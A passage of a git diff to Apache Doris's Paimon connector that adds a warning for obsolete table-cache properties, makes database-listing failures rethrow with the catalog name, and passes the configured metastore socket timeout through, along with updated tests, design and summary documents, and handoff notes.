RuntimeException( + "Failed to list databases names, catalog name: " + context.getCatalogName(), e); } } diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProvider.java index 35efd3ecf14d5b..882b478446754b 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProvider.java @@ -22,8 +22,13 @@ import org.apache.doris.connector.spi.ConnectorContext; import org.apache.doris.connector.spi.ConnectorProvider; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + import java.util.Collections; +import java.util.List; import java.util.Map; +import java.util.stream.Collectors; /** * SPI entry point for the Paimon connector. @@ -33,6 +38,15 @@ */ public class PaimonConnectorProvider implements ConnectorProvider { + private static final Logger LOG = LogManager.getLogger(PaimonConnectorProvider.class); + + // Legacy PaimonExternalCatalog.checkProperties validated these table-handle cache knobs + // (meta.cache.paimon.table.{enable,ttl-second,capacity}) via CacheSpec. On the plugin path they are dead: + // a cut-over paimon table reports meta-cache engine "default" (not "paimon"), so it never reaches + // PaimonExternalMetaCache, which these keys size. Re-imposing CacheSpec validation would only reject malformed + // values for a knob that no longer does anything; instead warn the operator the keys are ignored (R2). + private static final String DEAD_TABLE_CACHE_PREFIX = "meta.cache.paimon.table."; + @Override public String getType() { return "paimon"; @@ -56,6 +70,20 @@ public Connector create(Map properties, ConnectorContext context */ @Override public void validateProperties(Map properties) { + warnIgnoredDeadTableCacheKeys(properties); MetaStoreProviders.bind(properties, Collections.emptyMap()).validate(); } + + // R2: warn (do not reject, do not strip) when a CREATE/ALTER CATALOG carries the now-dead paimon + // table-cache knobs, so the operator learns their cache tuning no longer takes effect on the plugin path. + private static void warnIgnoredDeadTableCacheKeys(Map properties) { + List dead = properties.keySet().stream() + .filter(k -> k.startsWith(DEAD_TABLE_CACHE_PREFIX)) + .sorted() + .collect(Collectors.toList()); + if (!dead.isEmpty()) { + LOG.warn("Paimon catalog cache property/properties {} no longer take effect on the plugin path " + + "(the table metadata cache configuration is obsolete) and are ignored.", dead); + } + } } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataReadAuthTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataReadAuthTest.java index 0d6626de87121d..da83b09598f557 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataReadAuthTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataReadAuthTest.java @@ -70,10 +70,15 @@ public void listDatabaseNamesRunsSeamInsideAuthenticator() { RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); RecordingConnectorContext ctx = new RecordingConnectorContext(); ctx.failAuth = true; - // listDatabaseNames swallows failures and returns empty; the proof is that the seam NEVER ran - // (log empty) yet the authenticator was entered. MUTATION: an un-wrapped direct - // catalogOps.listDatabases() would log "listDatabases" despite the auth failure -> red. - Assertions.assertTrue(metadata(ops, ctx).listDatabaseNames(null).isEmpty()); + // R3: listDatabaseNames now RETHROWS the failure (carrying the catalog name) instead of swallowing to + // empty, matching legacy PaimonMetadataOps. The seam still NEVER ran (log empty) yet the authenticator + // was entered, so the M-11 wrap coverage holds. MUTATION: an un-wrapped direct catalogOps.listDatabases() + // would log "listDatabases" despite the auth failure -> red; reverting to swallow-to-empty makes the + // assertThrows red. + RuntimeException ex = Assertions.assertThrows(RuntimeException.class, + () -> metadata(ops, ctx).listDatabaseNames(null)); + Assertions.assertTrue(ex.getMessage().contains(ctx.getCatalogName()), + "rethrown failure must carry the catalog name (legacy parity)"); Assertions.assertTrue(ops.log.isEmpty(), "auth failure must abort BEFORE the listDatabases seam runs"); Assertions.assertEquals(1, ctx.authCount); diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorValidatePropertiesTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorValidatePropertiesTest.java index 1db531225ae065..9015df7c095d07 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorValidatePropertiesTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorValidatePropertiesTest.java @@ -72,6 +72,17 @@ public void requiresWarehouseForFilesystem() { () -> validate(props("paimon.catalog.type", "filesystem"))); } + @Test + public void deadTableCacheKeyIsAcceptedNotRejected() { + // R2: legacy validated meta.cache.paimon.table.{enable,ttl-second,capacity} via CacheSpec (rejecting + // malformed values). On the plugin path those keys are dead (a cut-over paimon table reports meta-cache + // engine "default", never PaimonExternalMetaCache), so a malformed value is intentionally NOT rejected + // (warn-only). The catalog is otherwise well-formed, so the dead key is the only variable. + Assertions.assertDoesNotThrow(() -> validate(props( + "paimon.catalog.type", "filesystem", "warehouse", "/wh", + "meta.cache.paimon.table.capacity", "-5"))); + } + @Test public void requiresWarehouseForRest() { // Legacy parity: AbstractPaimonProperties requires warehouse and PaimonRestMetaStoreProperties diff --git a/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java b/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java index 81b5fcf19cd951..94e6881581c258 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java +++ b/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java @@ -266,6 +266,11 @@ private static Map buildEnvironment() { env.put("force_sqlserver_jdbc_encrypt_false", String.valueOf(Config.force_sqlserver_jdbc_encrypt_false)); env.put("jdbc_driver_secure_path", Config.jdbc_driver_secure_path); + // HMS metastore client socket-timeout default (C4): the metastore-spi cannot read FE Config + // (no fe-common dependency), so the FE-configured value is threaded through the environment and + // applied by HmsMetaStoreProperties.toHiveConfOverrides when the user has not overridden it. + env.put("hive_metastore_client_timeout_second", + String.valueOf(Config.hive_metastore_client_timeout_second)); // The trino-connector plugin runs in an isolated classloader and cannot read FE // Config (it would see its own bundled copy with default values). Pass the // configured plugin dir through the engine environment instead. diff --git a/fe/fe-kerberos/src/main/java/org/apache/doris/kerberos/KerberosAuthSpec.java b/fe/fe-kerberos/src/main/java/org/apache/doris/kerberos/KerberosAuthSpec.java index 5705916844446b..a780ed0b3c1eee 100644 --- a/fe/fe-kerberos/src/main/java/org/apache/doris/kerberos/KerberosAuthSpec.java +++ b/fe/fe-kerberos/src/main/java/org/apache/doris/kerberos/KerberosAuthSpec.java @@ -31,7 +31,7 @@ * *

    The HMS service principal (e.g. {@code hive.metastore.kerberos.principal}) is * deliberately NOT part of this spec: it is a HiveConf override carried via - * {@code HmsMetaStoreProperties.toHiveConfOverrides()}, not a doAs login fact. + * {@code HmsMetaStoreProperties.toHiveConfOverrides(String)}, not a doAs login fact. */ public final class KerberosAuthSpec { diff --git a/plan-doc/designs/FIX-C4-R2-R3-CATALOG-design.md b/plan-doc/designs/FIX-C4-R2-R3-CATALOG-design.md new file mode 100644 index 00000000000000..d0579b3307b92d --- /dev/null +++ b/plan-doc/designs/FIX-C4-R2-R3-CATALOG-design.md @@ -0,0 +1,177 @@ +# FIX-C4 / R2-catalog / R3-catalog — combined design + +> Source findings: `reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md` §C4 (config), §R2 (catalog), §R3 (catalog). +> Three independent MINOR fixes, combined into one task-loop / one commit (HANDOFF "可合一"). +> Single-task loop: design → design red-team → implement → impl-verify → build+UT → commit → summary. + +## Scope & decisions + +| Fix | Finding | Legacy class | Decision | +|-----|---------|--------------|----------| +| **C4** | HMS socket timeout hardcoded `"10"`, ignores `Config.hive_metastore_client_timeout_second` | missing-port | Thread the FE config value through `ConnectorContext.getEnvironment()` | +| **R2-catalog** | dead `meta.cache.paimon.table.*` keys silently accepted (legacy `CacheSpec` rejected malformed) | missing-port | **Warn-only in the paimon connector** (user-confirmed) — NOT strip, NOT in the generic bridge | +| **R3-catalog** | `listDatabaseNames` swallows remote failure → `emptyList()` (legacy rethrew) | intentional-deviation | **Rethrow `RuntimeException` with catalog name** (user-confirmed) — exact legacy parity | + +Two judgment calls were put to the user and confirmed: R2 = warn-only (the report's "strip" + its cited +generic-bridge location both rejected: the key is paimon-specific, so it must live in the connector, not the +connector-agnostic `PluginDrivenExternalCatalog`); R3 = rethrow (matches legacy `PaimonMetadataOps:340` exactly +*and* every other connector — Hive/Hudi/JDBC/MC/Trino all propagate — and fixes a false "parity" comment). + +--- + +## C4 — thread `hive_metastore_client_timeout_second` + +**Root cause.** The HMS socket-timeout default moved from legacy `HMSBaseProperties.checkAndInit()` (which read +`Config.hive_metastore_client_timeout_second`) into `HmsMetaStorePropertiesImpl.toHiveConfOverrides()` step 4, which +hardcodes literal `"10"`. The metastore-spi module has no fe-common dependency, so it cannot read FE `Config`. Only +an operator who raises `fe.conf hive_metastore_client_timeout_second` *without* a per-catalog +`hive.metastore.client.socket.timeout` is affected (gets 10 instead of the configured value). + +**Why parity holds when unset.** `Config.hive_metastore_client_timeout_second` default = `10` +(`Config.java:2106`), so the threaded value is `"10"` when unconfigured — byte-identical to today. + +**Plumbing (4 modules, mirrors the existing env-key pattern).** + +1. **fe-core** `DefaultConnectorContext.buildEnvironment()` — add one line, alongside `jdbc_drivers_dir` etc.: + ```java + env.put("hive_metastore_client_timeout_second", + String.valueOf(Config.hive_metastore_client_timeout_second)); + ``` +2. **metastore-api** `HmsMetaStoreProperties` — change the HMS-specific method signature: + `Map toHiveConfOverrides()` → `toHiveConfOverrides(String defaultClientSocketTimeoutSeconds)`. + (HMS-specific interface method, single production caller — contained blast radius.) +3. **metastore-spi** `HmsMetaStorePropertiesImpl.toHiveConfOverrides(String)` — step 4 uses the param instead of + `"10"`, keeping the existing user-override guard (`raw.get("hive.metastore.client.socket.timeout")` blank-check, + verifier-confirmed equivalent to legacy guard-key). Defensive fallback to `"10"` if the param is blank/null: + ```java + if (StringUtils.isBlank(raw.get("hive.metastore.client.socket.timeout"))) { + conf.put("hive.metastore.client.socket.timeout", + StringUtils.isNotBlank(defaultClientSocketTimeoutSeconds) + ? defaultClientSocketTimeoutSeconds : "10"); + } + ``` + Also update the `{@link #toHiveConfOverrides()}` javadoc reference at line 35 → `(String)`. +4. **paimon** `PaimonConnector` HMS branch (`:183`) — pass the env value: + ```java + HiveConf hc = PaimonCatalogFactory.assembleHiveConf(hiveConfFiles, + hms.toHiveConfOverrides( + context.getEnvironment().getOrDefault("hive_metastore_client_timeout_second", "10"))); + ``` + +**Not affected.** DLF path uses `toDlfCatalogConf()` (no socket-timeout default — verified); REST/JDBC/FS have no +HMS socket timeout. Only the HMS branch threads the value. + +**Tests.** Update the ~10 `toHiveConfOverrides()` call-sites (8 in `HmsMetaStorePropertiesTest`, 1 anon impl + +1 caller in `MetaStorePropertiesContractTest`) to the new signature — pass `"10"` to preserve existing assertions. +Add a C4 test: a non-default value (`"60"`) flows to `hive.metastore.client.socket.timeout`, and a user-set +`hive.metastore.client.socket.timeout` suppresses it (override wins) — encodes the *intent* (Rule 9). + +--- + +## R2-catalog — warn on dead `meta.cache.paimon.table.*` keys + +**Root cause.** Legacy `PaimonExternalCatalog.checkProperties()` ran `CacheSpec.check{Boolean,Long}Property` on +`meta.cache.paimon.table.{enable,ttl-second,capacity}` (threw `DdlException` for malformed values). On the plugin +path those checks are gone, so a malformed value is accepted. The keys are **100% dead** (the plugin path uses the +generic schema cache; `PaimonExternalMetaCache`/`ExternalMetaCacheMgr.paimon` have zero non-legacy callers), so even +a well-formed value is a no-op. + +**Decision (user-confirmed): warn-only, in the connector.** The key is paimon-specific, so the connector-agnostic +`PluginDrivenExternalCatalog` (the report's cited location) is the wrong layer — handling it there violates the +"no source-specific code in the generic SPI layer" rule (memory `catalog-spi-plugindriven-no-source-specific-code`). +Re-imposing full `CacheSpec` validation is pointless (the report agrees) — it would reject malformed values for a +knob that does nothing. Stripping mutates persisted properties (SHOW CREATE CATALOG would no longer echo what the +user typed) and needs a non-validate hook. Warn-only delivers the real value — telling the operator the knob is dead +— at the right layer with the least change. + +**Change.** `PaimonConnectorProvider.validateProperties(Map)` (already paimon-specific, called once per +CREATE/ALTER CATALOG via `ConnectorFactory.validateProperties`): before the existing `bind().validate()`, scan for +keys with prefix `meta.cache.paimon.table.` and, if any, `LOG.warn` that they no longer take effect on the paimon +plugin path. Add a log4j logger to the class (none today). Detect by prefix (no need to import the three legacy +fe-core constant strings). + +```java +private static final String DEAD_TABLE_CACHE_PREFIX = "meta.cache.paimon.table."; +... +List dead = properties.keySet().stream() + .filter(k -> k.startsWith(DEAD_TABLE_CACHE_PREFIX)).sorted().collect(Collectors.toList()); +if (!dead.isEmpty()) { + LOG.warn("Paimon catalog property/properties {} no longer take effect (the plugin path uses the " + + "generic metadata cache); they are ignored.", dead); +} +``` + +**Tests.** `PaimonConnectorProviderTest` (or new) — asserting a warn is logged is brittle; instead assert +`validateProperties` does **not throw** when a `meta.cache.paimon.table.capacity=-5` (legacy-malformed) key is +present (documents the deliberate no-reject), and still throws for a genuinely invalid catalog (unknown +`paimon.catalog.type`). The warn itself is observable-only; no behavioral assertion. + +--- + +## R3-catalog — rethrow `listDatabaseNames` failure with catalog name + +**Root cause.** `PaimonConnectorMetadata.listDatabaseNames` catches `Exception`, `LOG.warn`s (no catalog name), +returns `emptyList()` — a transient remote failure presents as "zero databases". Legacy +`PaimonMetadataOps.listDatabaseNames` (`:336-342`) rethrew `RuntimeException("Failed to list databases names, +catalog name: " + name, e)`. The connector's comment ("legacy ... wrapped it too. Full read-vs-DDL parity") is +**false**. Paimon is the sole connector that swallows (verifier-confirmed: all others propagate). + +**Change.** `PaimonConnectorMetadata.listDatabaseNames` — rethrow with the catalog name, dropping the swallow: +```java +try { + return context.executeAuthenticated(() -> catalogOps.listDatabases()); +} catch (Exception e) { + throw new RuntimeException( + "Failed to list databases names, catalog name: " + context.getCatalogName(), e); +} +``` +Keep the `executeAuthenticated` wrap (M-11 Kerberos UGI). Rewrite the false comment to state the real parity +(legacy rethrew). `context.getCatalogName()` exists on `ConnectorContext`. `RuntimeException` is unchecked → +no signature change; the bridge `PluginDrivenExternalCatalog.listDatabaseNames:226` does not catch → it propagates +to DB-init exactly as legacy did. `Collections` import stays (used in ~10 other spots). + +**Tests.** `PaimonConnectorMetadataTest` (or existing) — when `catalogOps.listDatabases()` throws, assert +`listDatabaseNames` throws (not empty), and the message carries the catalog name. RED→GREEN: with the old swallow +the test sees `emptyList()` (red), with the rethrow it throws (green). + +--- + +## Risk / blast-radius + +- **C4** changes a metastore-api interface method signature, but `HmsMetaStoreProperties` is consumed only by paimon + (sole cut-over connector) + tests → contained. Default-preserving when `fe.conf` unset. +- **R2** is warn-only → no behavior change beyond a log line at CREATE/ALTER CATALOG. +- **R3** is a real behavior change (swallow→throw) on a transient-failure edge: a flaky metastore now errors SHOW + DATABASES instead of returning empty. This is the legacy behavior and matches all other connectors — the safer, + less-surprising contract (empty-on-error masks failures). User-confirmed. +- All three are gated/CI-only for live e2e; UT + build are the verification gate. + +## Design red-team resolution (wf_444e33b9-5c6 — 4 lenses, 12 findings, 9 confirmed / 3 refuted → GO-WITH-CHANGES) + +The 3 production-code changes were judged sound; all confirmed defects were in the test plan / doc, now folded in: + +- **R2 premise re-verified (the one substantive concern).** A verifier challenged "100% dead" citing + `PaimonUtils.java:56-57` / `PaimonExternalMetaCache`. Traced and **refuted**: `ExternalTable.getMetaCacheEngine()` + returns `"default"` and PluginDriven tables do **not** override it, so a cut-over paimon table routes + `ExternalMetaCacheMgr.getSchemaCacheValue` to the generic `"default"` cache — never `PaimonExternalMetaCache` + (engine `"paimon"`). `meta.cache.paimon.table.*` sizes only `PaimonExternalMetaCache.tableEntry`, reached solely + via `getPaimonTable`/`getLatestSnapshotCacheValue` ← legacy `PaimonExternalTable`/`PaimonScanNode`. **Dead on the + plugin path confirmed; warn message accurate.** +- **C4 call-sites = 9 (not 8)** in `HmsMetaStorePropertiesTest` (incl. inline `:219`, `:226`) + anon impl + caller + in `MetaStorePropertiesContractTest` = 11 total. Clean signature change (no test-only overload). Also fix 3 stale + `{@code …toHiveConfOverrides()}` mentions (`KerberosAuthSpec:34`, `PaimonCatalogFactory:53,311`) — doc hygiene. +- **R2 test home** = `PaimonConnectorValidatePropertiesTest` (no `PaimonConnectorProviderTest` exists); no-reject + test uses a **well-formed** catalog so the dead key is the only variable; `rejectsUnknownFlavor()` already covers + the throw case. Warn re-fires on each ALTER while the key persists — accepted (no strip, no old/new diffing). +- **R3 = MIGRATE the existing test, not add alongside.** `PaimonConnectorMetadataReadAuthTest` + `listDatabaseNamesRunsSeamInsideAuthenticator:76`: `.isEmpty()` → `assertThrows(RuntimeException.class, …)`, + KEEP `ops.log.isEmpty()` + `authCount==1` (M-11 seam coverage holds — `failAuth` throws before the seam) and also + assert the message carries the catalog name (`ctx.getCatalogName()=="test"`). Rewrite the false comment. + +## Verification plan + +1. fe-core compiles; metastore-spi + metastore-api compile; paimon connector compiles (`-am`, build-cache off). +2. `HmsMetaStorePropertiesTest` (updated + new C4 test) green; `MetaStorePropertiesContractTest` green. +3. paimon connector tests green (incl. new R2 no-reject + R3 rethrow tests). +4. checkstyle + `tools/check-connector-imports.sh` clean. +5. Mutation check: revert each fix → its new test goes red. diff --git a/plan-doc/designs/FIX-C4-R2-R3-CATALOG-summary.md b/plan-doc/designs/FIX-C4-R2-R3-CATALOG-summary.md new file mode 100644 index 00000000000000..3d04ca51fb36f1 --- /dev/null +++ b/plan-doc/designs/FIX-C4-R2-R3-CATALOG-summary.md @@ -0,0 +1,64 @@ +# FIX-C4 / R2-catalog / R3-catalog — summary (DONE) + +> Combined fix for three MINOR findings from `reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md`. +> Design: `FIX-C4-R2-R3-CATALOG-design.md`. Single commit ("可合一"). Two red-team passes (design + impl), both clean. + +## What changed + +| Fix | Change | Files | +|-----|--------|-------| +| **C4** | Thread `Config.hive_metastore_client_timeout_second` (env key) into `HmsMetaStoreProperties.toHiveConfOverrides(String)` instead of the hardcoded `"10"` | `DefaultConnectorContext` (producer), `HmsMetaStoreProperties` (api), `HmsMetaStorePropertiesImpl` (spi), `PaimonConnector` (consumer) | +| **R2-catalog** | `PaimonConnectorProvider.validateProperties` **warns** (no reject, no strip) on dead `meta.cache.paimon.table.*` keys | `PaimonConnectorProvider` | +| **R3-catalog** | `PaimonConnectorMetadata.listDatabaseNames` **rethrows** `RuntimeException("Failed to list databases names, catalog name: ", e)` instead of swallowing to `emptyList()` | `PaimonConnectorMetadata` | + +Plus 3 stale `{@code …toHiveConfOverrides()}` doc-mentions updated to `(String)` (`KerberosAuthSpec`, `PaimonCatalogFactory` ×2 — doc hygiene, not gated). + +## Decisions & facts + +- **C4 parity:** `Config.hive_metastore_client_timeout_second` default = `10` (`Config.java:2106`), so the threaded value + is byte-identical (`"10"`) when `fe.conf` is unset; an operator who raises it (e.g. `60`) without a per-catalog + `hive.metastore.client.socket.timeout` now gets `60` (legacy behavior), restoring `HMSBaseProperties:204-208`. The + user-override guard (`raw.get("hive.metastore.client.socket.timeout")` blank-check) is unchanged. Only the HMS branch + threads the value — DLF (`toDlfCatalogConf`)/JDBC/REST/FS have no socket-timeout default (legacy parity). + Clean signature change (no test-only overload); 11 call-sites updated (9 in `HmsMetaStorePropertiesTest`, anon impl + + caller in `MetaStorePropertiesContractTest`). +- **R2 — keys are genuinely dead on the plugin path (empirically proven, two reviews agree):** + `ExternalTable.getMetaCacheEngine()` returns `"default"` and PluginDriven tables do **not** override it, so a cut-over + paimon table routes `ExternalMetaCacheMgr.getSchemaCacheValue` to the generic `"default"` cache — never + `PaimonExternalMetaCache` (engine `"paimon"`). `meta.cache.paimon.table.*` sizes only + `PaimonExternalMetaCache.tableEntry`, reached solely via `getPaimonTable`/`getLatestSnapshotCacheValue` ← legacy + `PaimonExternalTable`/`PaimonScanNode`. A design-red-team verifier's "may be live" counter-claim was refuted by this + `="default"` routing trace. **Warn-only chosen over the report's "strip"** (user-confirmed): strip mutates persisted + props (SHOW CREATE CATALOG would stop echoing the user's input) and the key is paimon-specific so it belongs in the + connector, not the connector-agnostic `PluginDrivenExternalCatalog` (the report's cited location — wrong layer per the + "no source-specific code in the generic SPI layer" rule). Re-validating a dead knob is pointless (report agrees). +- **R3 — rethrow matches legacy exactly** (`PaimonMetadataOps:340`, same message incl. catalog name) **and** every other + connector (Hive/Hudi/JDBC/MC/Trino all propagate; paimon was the sole swallower). The connector's old comment claiming + "Full read-vs-DDL parity" while swallowing was false; rewritten. Propagation is clean: the bridge + `PluginDrivenExternalCatalog.listDatabaseNames:226` does not catch, so the `RuntimeException` reaches DB-init exactly + as legacy did. `executeAuthenticated` (M-11 Kerberos wrap) preserved. `RuntimeException` is unchecked → no signature + change; `LOG`/`Collections` imports still used elsewhere. + +## Verification + +- **Builds:** fe-core `compile` BUILD SUCCESS (DefaultConnectorContext); paimon `package -Dassembly.skipAssembly=true` + BUILD SUCCESS; metastore-api/spi `test` BUILD SUCCESS. +- **Tests:** paimon **280/0/0** (+1 skip = gated `PaimonLiveConnectivityTest`); `PaimonConnectorValidatePropertiesTest` + 14/0/0 (+1 R2 no-reject); `PaimonConnectorMetadataReadAuthTest` 12/0/0 (R3 migrated swallow→rethrow, M-11 coverage + kept); `HmsMetaStorePropertiesTest` 16/0/0 (+3 C4); `MetaStorePropertiesContractTest` 3/0/0. +- **Mutation (by construction):** C4 `threadedSocketTimeoutDefaultFlowsThrough` asserts `"60"` (old hardcoded `"10"` + cannot satisfy); R3 test asserts `assertThrows` (old swallow-to-empty cannot throw). R2 test is a regression-guard + (warn-only has no behavioral mutation to catch — it pins "do not re-add rejection"). +- **checkstyle 0** across all touched modules; `tools/check-connector-imports.sh` exit 0. +- **Red-team ×2:** design (`wf_444e33b9-5c6`, GO-WITH-CHANGES — all corrections folded in) + impl (`wf_b3d35e64-6b9`, + COMMIT — 0 actionable / 13 self-resolving NITs). +- **e2e:** gated (`enablePaimonTest=false`) — NOT run. + +## Out-of-scope (documented, not changed) + +- **C4 SPI gate vs legacy enum-name gate:** the SPI guards the socket-timeout default on + `StringUtils.isBlank(raw.get("hive.metastore.client.socket.timeout"))`; legacy guarded on + `userOverriddenHiveConfig.containsKey(ConfVars.METASTORE_CLIENT_SOCKET_TIMEOUT.toString())`. Equivalent for the + documented key; this predates C4 (C4 only swapped the value `"10"` → threaded default) and the SPI form is the + more-correct one. Left per Rule 3/7. +- R2 log wording "property/properties {}" reads awkwardly but is accurate — cosmetic, left as-is. From 49157986c8aaf06a708c0af4cca5c50633d83305 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 10:31:58 +0800 Subject: [PATCH 109/128] =?UTF-8?q?docs(catalog-spi):=20P6=20C4/R2/R3=20fi?= =?UTF-8?q?x=20done=20=E2=86=92=20HANDOFF=20next=20=3D=20P6-DEVIATIONS=20(?= =?UTF-8?q?accept-as-deviation=20batch)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit C4/R2-catalog/R3-catalog (3 MINOR, combined) DONE in 82b6de0de98. Updated HANDOFF + task-list: all P6 code-change fixes are now complete; the only remaining P6-fixes item is the accept-as-deviation batch (P6-DEVIATIONS → deviations-log.md, needs user sign-off). Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 29 ++++++++++++++++++++++------- plan-doc/task-list-P6-fixes.md | 15 ++++++++++++--- 2 files changed, 34 insertions(+), 10 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 0ce459bb848ad6..993564657ae31d 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -6,7 +6,7 @@ --- -# 🎯 下一个 session 的任务 — **P6 修复进行中:R1-table DONE → 下一个 = C4 / R2-catalog / R3-catalog (3 MINOR, 可合一)** +# 🎯 下一个 session 的任务 — **P6 代码修复全部 DONE(C4/R2/R3 合一 `82b6de0de98`)→ 下一个 = P6-DEVIATIONS(accept-as-deviation 批次,需用户签字)** > **进度(2026-06-19)**:P6 发现项按 `task-list-P6-fixes.md` 的 prioritized list 逐个修(单任务循环: > design → 红队 → 实现 → impl 验证 → build+UT → commit)。 @@ -26,8 +26,18 @@ > (paimon `:195/:212` + maxcompute `:184/:195`,remote+local 两臂皆 1050)。es/jdbc/trino 对已存在表 CREATE 现报「already exists」(NIT)。 > 改写 remote 测 + 强化 local 测加 errno 断言(**RED→GREEN 突变验证**:重加守卫→remote 测红);26/0/0 DdlRouting + 12/0/0 Engine + > checkstyle 干净;**e2e gated**。design 红队 `wf_19fd7785-165`(0 actionable)。详见 `designs/FIX-R1-TABLE-{design,summary}.md`。 -> **下一个 = C4 / R2-catalog / R3-catalog(3 MINOR,可合一)**:C4 透传 `hive_metastore_client_timeout_second`;R2-catalog -> warn-and-strip 死键 `meta.cache.paimon.table.*`;R3-catalog `listDatabaseNames` `LOG.warn` 带 catalog 名。最后 accept-as-deviation 批次。 +> **✅ C4 / R2-catalog / R3-catalog(3 MINOR,合一)已完成 `82b6de0de98`**:**C4** 透传 +> `Config.hive_metastore_client_timeout_second`(env key `hive_metastore_client_timeout_second` → `HmsMetaStoreProperties +> .toHiveConfOverrides(String)`,去硬编码 `"10"`;fe.conf 未设时 byte-parity,恢复 `HMSBaseProperties:204-208`)。**R2-catalog** +> 改 **warn-only**(非 strip,用户拍板)在 `PaimonConnectorProvider.validateProperties` 提示死键 `meta.cache.paimon.table.*`—— +> 经 `getMetaCacheEngine()=="default"`(PluginDriven 不 override)证实 plugin 路从不碰 `PaimonExternalMetaCache`,键确死; +> warn 落连接器(非 connector-agnostic 桥,report 引的位置=错层)。**R3-catalog** 改 **rethrow**(用户拍板,非仅加 catalog 名)—— +> `listDatabaseNames` 抛 `RuntimeException("Failed to list databases names, catalog name: ")` 与 legacy +> `PaimonMetadataOps:340` 完全一致(且所有其它连接器都 propagate),原先吞成 emptyList 且注释谎称 parity。280/0 paimon(+1 +> gated skip)+16/0+3/0+14/0+12/0;fe-core 编译过;checkstyle 0;import-check 干净;design+impl 两道红队均 0-actionable;e2e gated。 +> 详见 `designs/FIX-C4-R2-R3-CATALOG-{design,summary}.md`(design 红队 `wf_444e33b9-5c6`、impl 红队 `wf_b3d35e64-6b9`)。 +> **下一个 = P6-DEVIATIONS(accept-as-deviation 批次)**:~10 MINOR + ~12 NIT 刻意偏离 + wave-2 新增 + uncheckedFallbacks, +> 逐条记入新建 `deviations-log.md`(需用户签字)。这是 P6-fixes 这一批的最后一项;做完即清零。 paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口线,2 波,零历史先验)**已完成**。 报告:[`reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md`](./reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md)(未跟踪,待 vet+commit)。 @@ -70,9 +80,14 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 守卫 → 存在分支无条件报 `ERR_TABLE_EXISTS_ERROR`(1050),在 `metadata.createTable` 前短路;精确 legacy parity(paimon+maxcompute remote+local 两臂皆 1050);改写 remote 测 + 强化 local 测 errno 断言(RED→GREEN);26/0/0+12/0/0+checkstyle 干净;红队 0 actionable。 详见 `designs/FIX-R1-TABLE-{design,summary}.md`。 - - **C4 / R2-catalog / R3-catalog**(MINOR,可合一,下一个):HMS socket timeout 透传 `hive_metastore_client_timeout_second` / - `meta.cache.paimon.table.*` warn-and-strip(键已 dead)/ `listDatabaseNames` `LOG.warn` 带 catalog 名(择一)。 - - 其余 MINOR/NIT + wave2 新增(全 intentional-deviation):报告已标「文档化为接受偏离」,逐条 accept-as-deviation(含用户签字)。 + - ✅ **C4 / R2-catalog / R3-catalog**(3 MINOR,合一)— **DONE `82b6de0de98`**:C4 透传 + `Config.hive_metastore_client_timeout_second`(去硬编码 `"10"`,fe.conf 未设 byte-parity);R2-catalog **warn-only** + (非 strip,用户拍板)提示死键 `meta.cache.paimon.table.*`(`getMetaCacheEngine()=="default"` 证实 plugin 路不碰 + `PaimonExternalMetaCache`,键确死);R3-catalog **rethrow**(用户拍板)`RuntimeException` 带 catalog 名,与 legacy + `PaimonMetadataOps:340` 一致(原吞成 emptyList)。280/0+16/0+3/0+14/0+12/0;checkstyle 0;两道红队 0-actionable。 + 详见 `designs/FIX-C4-R2-R3-CATALOG-{design,summary}.md`。 + - **P6-DEVIATIONS(下一个,本批最后一项)**:~10 MINOR + ~12 NIT 刻意偏离 + wave2 新增 + uncheckedFallbacks(全 + intentional-deviation):报告已标「文档化为接受偏离」,逐条记入新建 `deviations-log.md` accept-as-deviation(含用户签字)。 1. **B8 legacy 删除(review 已解锁;须分阶段,按报告 §B8 deletion readiness 的 DEAD vs STILL-CONSUMED ledger)**: - **可删(DEAD,成单元同删)**:`datasource/paimon/*`(PaimonExternalCatalog/Factory、ExternalDatabase/Table、HMS/DLF/File/Rest 子类、 SysExternalTable、MetaCache 等)、`systable/PaimonSysTable`、`metacache/paimon/*` + `ExternalMetaCacheMgr.paimon()/ENGINE_PAIMON`、 @@ -95,7 +110,7 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 --- # 📦 仓库 / 进度状态 -- **HEAD = `f652b40d210`**(P6 修复 R1-table;前序 